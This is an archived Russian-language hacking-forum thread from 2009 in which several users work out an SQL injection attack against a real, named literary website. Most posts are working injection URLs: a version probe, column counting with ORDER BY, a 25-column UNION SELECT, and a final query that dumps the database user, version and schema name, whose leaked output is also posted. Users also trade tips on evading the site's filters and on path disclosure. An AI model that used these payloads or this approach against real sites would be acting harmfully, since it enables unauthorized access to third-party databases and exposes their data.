ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
28.01.2009, 14:43
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
http://ilibrary.ru/text/1+)and+substring(version(),1,1)=5;%20--%20((
подскажите)
|
|
|
28.01.2009, 14:54
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
1. Там другой комментарий, а именно /*
2. Там фильтруется "+"
|
|
|
|
28.01.2009, 15:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
И еще "=" заменяется на "."
Но можно раскрыть путь:
http://ilibrary.ru/text/1%22
и еще там addslashes (http://ru.php.net/addslashes)
http://ilibrary.ru/text/1'
так что скорее всего только путь пока
|
|
|
|
28.01.2009, 15:07
|
|
Познающий
Регистрация: 01.08.2008
Сообщений: 42
Провел на форуме:
670601
Репутация:
50
|
|
пробелы меняем на /**/
|
|
|
|
28.01.2009, 15:09
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
R1dex
Опять торопишься. Там слепая скуль на 4 ветке(может и можно вывод найти, особо не копал), комментарий не критично
http://ilibrary.ru/text/1320/?p=1+and+substring(version(),1,1)=4
http://ilibrary.ru/text/1320/?p=1))+order+by+25+--+
http://ilibrary.ru/text/1320/?p=1))+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5, 6,7,8,9,0,1,2,3,4,5/*
По результатам запроса, грузит файл отсюда:
http://ilibrary.ru/tx2/13/
Возможно и можно что-то вымутить, но мне лень 
Pashkela ай-я-яй
kevmen Я тебя умоляю, пока ненужно давать ответов на вопросы
|
|
|
|
28.01.2009, 15:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Corwin
пробелы меняем на /**/
ахахаха... там ведь мод реврайт и все / ситаются разделителями 
|
|
|
|
28.01.2009, 15:15
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от Corwin
пробелы меняем на /**/
не поможет, тк там mod_rewrite передает все на файл index.phtml, который как раз в REQUEST_URI заменяет = на точку, применяет urlencode и разбивает его на массив по слешам.
=/ чет запоздал с ответом
Последний раз редактировалось oRb; 28.01.2009 в 15:18..
|
|
|
|
28.01.2009, 15:32
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Да там даже вывод есть:
ilibrary_il@localhost:4.0.27-standard-log:ilibrary_ilibrary («ilibrary_il@localhost»)
|
|
|
|
28.01.2009, 15:40
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
В общем путём долгих манипуляций удалось понять какие поля уводят цикл обработки содержания в бесконечный цикл и исключить их, этот запрос даёт нормальный вывод:
http://ilibrary.ru/text/1320/?p=999))+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONC AT_WS(0x3a,USER(),VERSION(),DATABASE()),13,14,15,1 6,17,18,19,20,21,22,23,USER(),25%23
|
|
|
|
28.01.2009, 15:45
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
А как там вывод определить ? оО
ЗЫ: А твой метод борьбы я вообще не догнал))
Последний раз редактировалось Велемир; 28.01.2009 в 15:48..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
